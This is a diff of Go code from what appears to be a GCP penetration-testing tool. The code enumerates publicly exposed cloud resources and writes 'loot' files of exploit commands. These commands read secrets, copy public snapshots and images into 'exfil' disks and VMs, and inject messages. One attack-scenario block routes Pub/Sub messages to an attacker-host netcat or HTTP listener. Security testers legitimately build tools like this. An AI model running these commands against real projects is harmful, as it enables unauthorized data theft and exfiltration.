fn.ServiceConfig.Uri + } + + resource := PublicResource{ + ResourceType: "Cloud Function", + ResourceName: funcName, + ProjectID: projectID, + Location: location, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("URL: %s, Runtime: %s", url, fn.BuildConfig.Runtime), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Cloud Functions in project %s", projectID)) + } +} + +// checkPubSubTopics checks Pub/Sub topics for public access +func (m *PublicAccessModule) checkPubSubTopics(ctx context.Context, projectID string, logger internal.Logger) { + ps := pubsubservice.New() + topics, err := ps.Topics(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Pub/Sub topics in project %s", projectID)) + return + } + + for _, topic := range topics { + for _, binding := range topic.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + resource := PublicResource{ + ResourceType: "Pub/Sub Topic", + ResourceName: topic.Name, + ProjectID: projectID, + AccessLevel: binding.Member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Subscriptions: %d", topic.SubscriptionCount), + } + m.addResource(resource) + } + } + } +} + +// checkPubSubSubscriptions checks Pub/Sub subscriptions for public access +func (m *PublicAccessModule) checkPubSubSubscriptions(ctx context.Context, projectID string, logger internal.Logger) { + ps := pubsubservice.New() + subs, err := ps.Subscriptions(projectID) + if err != nil { + return + } + + for _, sub := range subs { + for _, binding := range sub.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + resource := PublicResource{ + ResourceType: "Pub/Sub Subscription", + ResourceName: sub.Name, + ProjectID: projectID, + AccessLevel: binding.Member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Topic: %s", sub.Topic), + } + m.addResource(resource) + } + } + } +} + +// checkSecretManagerSecrets checks Secret Manager secrets for public access +func (m *PublicAccessModule) checkSecretManagerSecrets(ctx context.Context, projectID string, logger internal.Logger) { + smService, err := secretmanager.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s", projectID) + req := smService.Projects.Secrets.List(parent) + err = req.Pages(ctx, func(page *secretmanager.ListSecretsResponse) error { + for _, secret := range page.Secrets { + // Get IAM policy + policy, err := smService.Projects.Secrets.GetIamPolicy(secret.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + secretName := publicAccessExtractResourceName(secret.Name) + resource := PublicResource{ + ResourceType: "Secret Manager", + ResourceName: secretName, + ProjectID: projectID, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Replication: %v", secret.Replication), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list secrets in project %s", projectID)) + } +} + +// checkArtifactRegistry checks Artifact Registry repositories for public access +func (m *PublicAccessModule) checkArtifactRegistry(ctx context.Context, projectID string, logger internal.Logger) { + arService, err := artifactregistry.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := arService.Projects.Locations.Repositories.List(parent) + err = req.Pages(ctx, func(page *artifactregistry.ListRepositoriesResponse) error { + for _, repo := range page.Repositories { + // Get IAM policy + policy, err := arService.Projects.Locations.Repositories.GetIamPolicy(repo.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + repoName := publicAccessExtractResourceName(repo.Name) + location := publicAccessExtractLocation(repo.Name) + resource := PublicResource{ + ResourceType: "Artifact Registry", + ResourceName: repoName, + ProjectID: projectID, + Location: location, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Format: %s", repo.Format), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Artifact Registry repos in project %s", projectID)) + } +} + +// checkKMSKeys checks Cloud KMS keys for public access +func (m *PublicAccessModule) checkKMSKeys(ctx context.Context, projectID string, logger internal.Logger) { + kmsSvc := kmsservice.New() + keys, err := kmsSvc.CryptoKeys(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list KMS keys in project %s", projectID)) + return + } + + for _, key := range keys { + for _, binding := range key.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + resource := PublicResource{ + ResourceType: "Cloud KMS", + ResourceName: key.Name, + ProjectID: projectID, + Location: key.Location, + AccessLevel: binding.Member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("KeyRing: %s, Purpose: %s, Protection: %s", key.KeyRing, key.Purpose, key.ProtectionLevel), + } + m.addResource(resource) + } + } + } +} + +// checkSpanner checks Cloud Spanner instances/databases for public access +func (m *PublicAccessModule) checkSpanner(ctx context.Context, projectID string, logger internal.Logger) { + spannerSvc := spannerservice.New() + result, err := spannerSvc.ListInstancesAndDatabases(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Spanner in project %s", projectID)) + return + } + + // Check instances + for _, instance := range result.Instances { + for _, binding := range instance.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + resource := PublicResource{ + ResourceType: "Spanner Instance", + ResourceName: instance.Name, + ProjectID: projectID, + AccessLevel: binding.Member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Config: %s, Nodes: %d", instance.Config, instance.NodeCount), + } + m.addResource(resource) + } + } + } + + // Check databases + for _, db := range result.Databases { + for _, binding := range db.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + resource := PublicResource{ + ResourceType: "Spanner Database", + ResourceName: db.Name, + ProjectID: projectID, + AccessLevel: binding.Member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Instance: %s, Encryption: %s", db.InstanceName, db.EncryptionType), + } + m.addResource(resource) + } + } + } +} + +// checkDataflowJobs checks Dataflow jobs for public IAM access +func (m *PublicAccessModule) checkDataflowJobs(ctx context.Context, projectID string, logger internal.Logger) { + dfService, err := dataflow.NewService(ctx) + if err != nil { + return + } + + // List jobs across all regions + req := dfService.Projects.Jobs.List(projectID) + err = req.Pages(ctx, func(page *dataflow.ListJobsResponse) error { + for _, job := range page.Jobs { + // Get IAM policy for job (requires aggregated) + // Note: Dataflow jobs don't have direct IAM policies, but we check job type + // Jobs reading from public sources can be a concern + if job.Type == "JOB_TYPE_STREAMING" || job.Type == "JOB_TYPE_BATCH" { + // Check if job has public-facing inputs (like Pub/Sub with allUsers) + // This is informational - jobs themselves don't have IAM + // but we flag them if they have concerning configurations + if hasPublicDataflowConfig(job) { + resource := PublicResource{ + ResourceType: "Dataflow Job", + ResourceName: job.Name, + ProjectID: projectID, + Location: job.Location, + AccessLevel: "allUsers", // Indicates public source/sink + Role: "dataflow.worker", + AdditionalInfo: fmt.Sprintf("Type: %s, State: %s", job.Type, job.CurrentState), + } + m.addResource(resource) + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list Dataflow jobs in project %s", projectID)) + } +} + +// hasPublicDataflowConfig checks if a Dataflow job has public-facing configurations +func hasPublicDataflowConfig(job *dataflow.Job) bool { + // Check job labels for signs of public data sources + if job.Labels != nil { + for key, value := range job.Labels { + if strings.Contains(strings.ToLower(key), "public") || + strings.Contains(strings.ToLower(value), "public") { + return true + } + } + } + // In practice, need to check the pipeline options for public sources + // This is a placeholder - full implementation would parse job graph + return false +} + +// getClusterState safely extracts cluster state, handling nil Status +func getClusterState(cluster *dataproc.Cluster) string { + if cluster.Status != nil { + return cluster.Status.State + } + return "UNKNOWN" +} + +// checkDataprocClusters checks Dataproc clusters for public access +func (m *PublicAccessModule) checkDataprocClusters(ctx context.Context, projectID string, logger internal.Logger) { + dpService, err := dataproc.NewService(ctx) + if err != nil { + return + } + + // Get regions from regionService (with automatic fallback) + regions := regionservice.GetCachedRegionNames(ctx, projectID) + for _, region := range regions { + parent := fmt.Sprintf("projects/%s/regions/%s", projectID, region) + req := dpService.Projects.Regions.Clusters.List(projectID, region) + err := req.Pages(ctx, func(page *dataproc.ListClustersResponse) error { + for _, cluster := range page.Clusters { + // Get IAM policy for cluster + policyReq := &dataproc.GetIamPolicyRequest{} + policy, err := dpService.Projects.Regions.Clusters.GetIamPolicy(parent+"/clusters/"+cluster.ClusterName, policyReq).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + resource := PublicResource{ + ResourceType: "Dataproc Cluster", + ResourceName: cluster.ClusterName, + ProjectID: projectID, + Location: region, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("Status: %s", getClusterState(cluster)), + } + m.addResource(resource) + } + } + } + } + return nil + }) + if err != nil { + // Don't fail on region errors, continue + continue + } + } +} + +// checkNotebooks checks Vertex AI Workbench notebooks for public access +func (m *PublicAccessModule) checkNotebooks(ctx context.Context, projectID string, logger internal.Logger) { + nbService, err := notebooks.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := nbService.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page *notebooks.ListInstancesResponse) error { + for _, instance := range page.Instances { + // Get IAM policy for notebook instance + policy, err := nbService.Projects.Locations.Instances.GetIamPolicy(instance.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + location := publicAccessExtractLocation(instance.Name) + resource := PublicResource{ + ResourceType: "Notebook Instance", + ResourceName: publicAccessExtractResourceName(instance.Name), + ProjectID: projectID, + Location: location, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("State: %s, Machine: %s", instance.State, instance.MachineType), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list notebooks in project %s", projectID)) + } +} + +// checkSourceRepos checks Cloud Source Repositories for public access +func (m *PublicAccessModule) checkSourceRepos(ctx context.Context, projectID string, logger internal.Logger) { + srService, err := sourcerepo.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s", projectID) + req := srService.Projects.Repos.List(parent) + err = req.Pages(ctx, func(page *sourcerepo.ListReposResponse) error { + for _, repo := range page.Repos { + // Get IAM policy for repo + policy, err := srService.Projects.Repos.GetIamPolicy(repo.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if shared.IsPublicPrincipal(member) { + resource := PublicResource{ + ResourceType: "Source Repository", + ResourceName: publicAccessExtractResourceName(repo.Name), + ProjectID: projectID, + AccessLevel: member, + Role: binding.Role, + AdditionalInfo: fmt.Sprintf("URL: %s", repo.Url), + } + m.addResource(resource) + } + } + } + } + return nil + }) + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICACCESS_MODULE_NAME, + fmt.Sprintf("Could not list source repos in project %s", projectID)) + } +} + +// addResource adds a public resource to the list thread-safely +func (m *PublicAccessModule) addResource(resource PublicResource) { + m.mu.Lock() + defer m.mu.Unlock() + m.ProjectPublicResources[resource.ProjectID] = append(m.ProjectPublicResources[resource.ProjectID], resource) + m.addResourceToLoot(resource, resource.ProjectID) +} + +// getAllPublicResources aggregates all public resources across projects +func (m *PublicAccessModule) getAllPublicResources() []PublicResource { + var allResources []PublicResource + for _, resources := range m.ProjectPublicResources { + allResources = append(allResources, resources...) + } + return allResources +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PublicAccessModule) addResourceToLoot(resource PublicResource, projectID string) { + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# [%s] %s: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Access: %s\n"+ + "# Role: %s\n", + resource.AccessLevel, + resource.ResourceType, + resource.ResourceName, + resource.ProjectID, + resource.AccessLevel, + resource.Role, + ) + + // Add type-specific commands + m.LootMap[projectID]["public-access-commands"].Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + switch resource.ResourceType { + case "Cloud Storage": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "gsutil ls gs://%s/\n"+ + "gsutil cp gs://%s/FILE ./\n\n", + resource.ResourceName, resource.ResourceName) + case "Compute Snapshot": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "gcloud compute disks create exfil-disk --source-snapshot=projects/%s/global/snapshots/%s --zone=us-central1-a\n\n", + resource.ProjectID, resource.ResourceName) + case "Compute Image": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "gcloud compute instances create exfil-vm --image=projects/%s/global/images/%s --zone=us-central1-a\n\n", + resource.ProjectID, resource.ResourceName) + case "BigQuery Dataset", "BigQuery Table": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s` LIMIT 100'\n\n", + resource.ProjectID, resource.ResourceName) + case "Cloud Run": + if strings.Contains(resource.AdditionalInfo, "URL:") { + url := strings.TrimPrefix(resource.AdditionalInfo, "URL: ") + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "curl -v %s\n\n", url) + } + case "Cloud Function": + if strings.Contains(resource.AdditionalInfo, "URL:") { + parts := strings.Split(resource.AdditionalInfo, ",") + if len(parts) > 0 { + url := strings.TrimPrefix(parts[0], "URL: ") + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "curl -v %s\n\n", url) + } + } + case "Pub/Sub Topic": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "gcloud pubsub topics publish %s --message='test' --project=%s\n\n", + resource.ResourceName, resource.ProjectID) + case "Pub/Sub Subscription": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "gcloud pubsub subscriptions pull %s --auto-ack --project=%s\n\n", + resource.ResourceName, resource.ProjectID) + case "Secret Manager": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "gcloud secrets versions access latest --secret=%s --project=%s\n\n", + resource.ResourceName, resource.ProjectID) + case "Artifact Registry": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s\n\n", + resource.Location, resource.ProjectID, resource.ResourceName) + case "Cloud KMS": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "# WARNING: Public KMS key access!\n"+ + "gcloud kms keys describe %s --keyring=KEYRING --location=%s --project=%s\n"+ + "# If encrypt role: can encrypt data with this key\n"+ + "# If decrypt role: can decrypt data encrypted with this key\n\n", + resource.ResourceName, resource.Location, resource.ProjectID) + case "Spanner Instance", "Spanner Database": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "# WARNING: Public Spanner access!\n"+ + "gcloud spanner databases list --instance=%s --project=%s\n"+ + "gcloud spanner databases execute-sql DATABASE --instance=%s --sql='SELECT * FROM TableName LIMIT 10' --project=%s\n\n", + resource.ResourceName, resource.ProjectID, resource.ResourceName, resource.ProjectID) + case "Dataproc Cluster": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "# WARNING: Public Dataproc cluster!\n"+ + "gcloud dataproc clusters describe %s --region=%s --project=%s\n"+ + "gcloud dataproc jobs list --cluster=%s --region=%s --project=%s\n\n", + resource.ResourceName, resource.Location, resource.ProjectID, + resource.ResourceName, resource.Location, resource.ProjectID) + case "Notebook Instance": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "# WARNING: Public Notebook instance!\n"+ + "gcloud notebooks instances describe %s --location=%s --project=%s\n"+ + "# Get proxy URL to access notebook\n\n", + resource.ResourceName, resource.Location, resource.ProjectID) + case "Source Repository": + m.LootMap[projectID]["public-access-commands"].Contents += fmt.Sprintf( + "# WARNING: Public Source Repository!\n"+ + "gcloud source repos clone %s --project=%s\n"+ + "# Clone and examine source code\n\n", + resource.ResourceName, resource.ProjectID) + default: + m.LootMap[projectID]["public-access-commands"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *PublicAccessModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *PublicAccessModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + pathBuilder := m.BuildPathBuilder() + + // Build per-project output data + projectLevelData := make(map[string]internal.CloudfoxOutput) + + for projectID, resources := range m.ProjectPublicResources { + header := []string{ + "Resource Type", + "Resource Name", + "Location", + "Access Level", + "Public Role", + "Size", + "Additional Info", + } + + var body [][]string + for _, r := range resources { + location := r.Location + if location == "" { + location = "global" + } + size := r.Size + if size == "" { + size = "-" + } + + body = append(body, []string{ + r.ResourceType, + r.ResourceName, + location, + r.AccessLevel, + r.Role, + size, + r.AdditionalInfo, + }) + } + + // Collect loot files for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{} + if len(body) > 0 { + tables = append(tables, internal.TableFile{ + Name: "public-access", + Header: header, + Body: body, + }) + } + + projectLevelData[projectID] = PublicAccessOutput{ + Table: tables, + Loot: lootFiles, + } + } + + outputData := internal.HierarchicalOutputData{ + ProjectLevelData: projectLevelData, + } + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_PUBLICACCESS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *PublicAccessModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allResources := m.getAllPublicResources() + + header := []string{ + "Project ID", + "Project Name", + "Resource Type", + "Resource Name", + "Location", + "Access Level", + "Public Role", + "Size", + "Additional Info", + } + + var body [][]string + for _, r := range allResources { + location := r.Location + if location == "" { + location = "global" + } + size := r.Size + if size == "" { + size = "-" + } + + body = append(body, []string{ + r.ProjectID, + m.GetProjectName(r.ProjectID), + r.ResourceType, + r.ResourceName, + location, + r.AccessLevel, + r.Role, + size, + r.AdditionalInfo, + }) + } + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tables := []internal.TableFile{} + if len(body) > 0 { + tables = append(tables, internal.TableFile{ + Name: "public-access", + Header: header, + Body: body, + }) + } + + output := PublicAccessOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_PUBLICACCESS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ + +func publicAccessExtractResourceName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +func publicAccessExtractLocation(fullName string) string { + // Format: projects/PROJECT/locations/LOCATION/... + parts := strings.Split(fullName, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +func publicAccessFormatBytes(bytes int64) string { + if bytes == 0 { + return "-" + } + const unit = 1024 + if bytes < unit { + return fmt.Sprintf("%d B", bytes) + } + div, exp := int64(unit), 0 + for n := bytes / unit; n >= unit; n /= unit { + div *= unit + exp++ + } + return fmt.Sprintf("%.1f %cB", float64(bytes)/float64(div), "KMGTPE"[exp]) +} diff --git a/gcp/commands/pubsub.go b/gcp/commands/pubsub.go new file mode 100644 index 00000000..3bdef915 --- /dev/null +++ b/gcp/commands/pubsub.go @@ -0,0 +1,922 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + PubSubService "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + "github.com/BishopFox/cloudfox/gcp/shared" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPubSubCommand = &cobra.Command{ + Use: globals.GCP_PUBSUB_MODULE_NAME, + Aliases: []string{"ps", "topics", "subscriptions"}, + Short: "Enumerate Pub/Sub topics and subscriptions with security analysis", + Long: `Enumerate Pub/Sub topics and subscriptions across projects with security-relevant details. + +Features: +- Lists all Pub/Sub topics and subscriptions +- Shows IAM configuration and public access +- Identifies push endpoints and their configurations +- Shows dead letter topics and retry policies +- Detects BigQuery and Cloud Storage exports +- Generates gcloud commands for further analysis + +Security Columns: +- PublicPublish: Whether allUsers/allAuthenticatedUsers can publish +- PublicSubscribe: Whether allUsers/allAuthenticatedUsers can subscribe +- KMS: Customer-managed encryption key status +- PushEndpoint: External URL receiving messages (data exfiltration risk) +- Exports: BigQuery/Cloud Storage export destinations + +Attack Surface: +- Public topics allow message injection +- Public subscriptions allow message reading +- Push endpoints may leak sensitive data +- Cross-project subscriptions indicate trust relationships`, + Run: runGCPPubSubCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type PubSubModule struct { + gcpinternal.BaseGCPModule + + ProjectTopics map[string][]PubSubService.TopicInfo // projectID -> topics + ProjectSubscriptions map[string][]PubSubService.SubscriptionInfo // projectID -> subscriptions + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type PubSubOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PubSubOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PubSubOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPubSubCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PUBSUB_MODULE_NAME) + if err != nil { + return + } + + module := &PubSubModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectTopics: make(map[string][]PubSubService.TopicInfo), + ProjectSubscriptions: make(map[string][]PubSubService.SubscriptionInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PubSubModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PUBSUB_MODULE_NAME, m.processProject) + + allTopics := m.getAllTopics() + allSubs := m.getAllSubscriptions() + + totalResources := len(allTopics) + len(allSubs) + if totalResources == 0 { + logger.InfoM("No Pub/Sub topics or subscriptions found", globals.GCP_PUBSUB_MODULE_NAME) + return + } + + // Count public resources and push subscriptions + publicTopics := 0 + publicSubs := 0 + pushSubs := 0 + for _, topic := range allTopics { + for _, binding := range topic.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + publicTopics++ + break + } + } + } + for _, sub := range allSubs { + for _, binding := range sub.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + publicSubs++ + break + } + } + if sub.PushEndpoint != "" { + pushSubs++ + } + } + + msg := fmt.Sprintf("Found %d topic(s), %d subscription(s)", len(allTopics), len(allSubs)) + if publicTopics > 0 || publicSubs > 0 { + msg += fmt.Sprintf(" (%d public topics, %d public subs)", publicTopics, publicSubs) + } + if pushSubs > 0 { + msg += fmt.Sprintf(" [%d push endpoints]", pushSubs) + } + logger.SuccessM(msg, globals.GCP_PUBSUB_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllTopics returns all topics from all projects +func (m *PubSubModule) getAllTopics() []PubSubService.TopicInfo { + var all []PubSubService.TopicInfo + for _, topics := range m.ProjectTopics { + all = append(all, topics...) + } + return all +} + +// getAllSubscriptions returns all subscriptions from all projects +func (m *PubSubModule) getAllSubscriptions() []PubSubService.SubscriptionInfo { + var all []PubSubService.SubscriptionInfo + for _, subs := range m.ProjectSubscriptions { + all = append(all, subs...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *PubSubModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Pub/Sub in project: %s", projectID), globals.GCP_PUBSUB_MODULE_NAME) + } + + ps := PubSubService.New() + + var topics []PubSubService.TopicInfo + var subs []PubSubService.SubscriptionInfo + + // Get topics + topicsResult, err := ps.Topics(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBSUB_MODULE_NAME, + fmt.Sprintf("Could not enumerate Pub/Sub topics in project %s", projectID)) + } else { + topics = topicsResult + } + + // Get subscriptions + subsResult, err := ps.Subscriptions(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBSUB_MODULE_NAME, + fmt.Sprintf("Could not enumerate Pub/Sub subscriptions in project %s", projectID)) + } else { + subs = subsResult + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectTopics[projectID] = topics + m.ProjectSubscriptions[projectID] = subs + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["pubsub-commands"] = &internal.LootFile{ + Name: "pubsub-commands", + Contents: "# Pub/Sub Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, topic := range topics { + m.addTopicToLoot(projectID, topic) + } + for _, sub := range subs { + m.addSubscriptionToLoot(projectID, sub) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d topic(s), %d subscription(s) in project %s", len(topics), len(subs), projectID), globals.GCP_PUBSUB_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *PubSubModule) addTopicToLoot(projectID string, topic PubSubService.TopicInfo) { + lootFile := m.LootMap[projectID]["pubsub-commands"] + if lootFile == nil { + return + } + + // Check for public access + publicAccess := "" + for _, binding := range topic.IAMBindings { + if shared.IsPublicPrincipal(binding.Member) { + publicAccess = " [PUBLIC ACCESS]" + break + } + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# TOPIC: %s%s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Subscriptions: %d\n", + topic.Name, publicAccess, + topic.ProjectID, topic.SubscriptionCount, + ) + + if topic.KmsKeyName != "" { + lootFile.Contents += fmt.Sprintf("# KMS Key: %s\n", topic.KmsKeyName) + } + + if topic.SchemaSettings != "" { + lootFile.Contents += fmt.Sprintf("# Schema: %s\n", topic.SchemaSettings) + } + + if len(topic.IAMBindings) > 0 { + lootFile.Contents += "# IAM Bindings:\n" + for _, binding := range topic.IAMBindings { + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + } + } + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe topic +gcloud pubsub topics describe %s --project=%s + +# Get IAM policy +gcloud pubsub topics get-iam-policy %s --project=%s + +# List all subscriptions for this topic +gcloud pubsub topics list-subscriptions %s --project=%s + +# List snapshots for this topic +gcloud pubsub snapshots list --filter="topic:%s" --project=%s + +# === EXPLOIT COMMANDS === + +# Publish a test message (requires pubsub.topics.publish) +gcloud pubsub topics publish %s --message='{"test": "message"}' --project=%s + +# Publish message with attributes +gcloud pubsub topics publish %s --message='test' --attribute='key1=value1,key2=value2' --project=%s + +# Publish from file +# echo '{"sensitive": "data"}' > message.json +# gcloud pubsub topics publish %s --message="$(cat message.json)" --project=%s + +# === ATTACK SCENARIOS === + +# Message Injection: If you can publish, inject malicious messages +# gcloud pubsub topics publish %s --message='{"cmd": "malicious_command"}' --project=%s + +# Create a new subscription to eavesdrop on messages (requires pubsub.subscriptions.create) +# gcloud pubsub subscriptions create attacker-sub-%s --topic=%s --project=%s + +# === NETCAT / WEBHOOK CAPTURE === + +# Step 1: Start a listener on your attacker host (e.g., a VM with a public IP) +# nc -lk 4444 +# Or use a simple HTTP server to see full requests: +# python3 -c "from http.server import HTTPServer, BaseHTTPRequestHandler; import json +# class H(BaseHTTPRequestHandler): +# def do_POST(self): +# data = self.rfile.read(int(self.headers['Content-Length'])) +# print(json.dumps({'headers': dict(self.headers), 'body': data.decode()}, indent=2)) +# self.send_response(200); self.end_headers() +# HTTPServer(('0.0.0.0', 8080), H).serve_forever()" + +# Step 2: Create a push subscription pointed at your listener (requires pubsub.subscriptions.create) +# 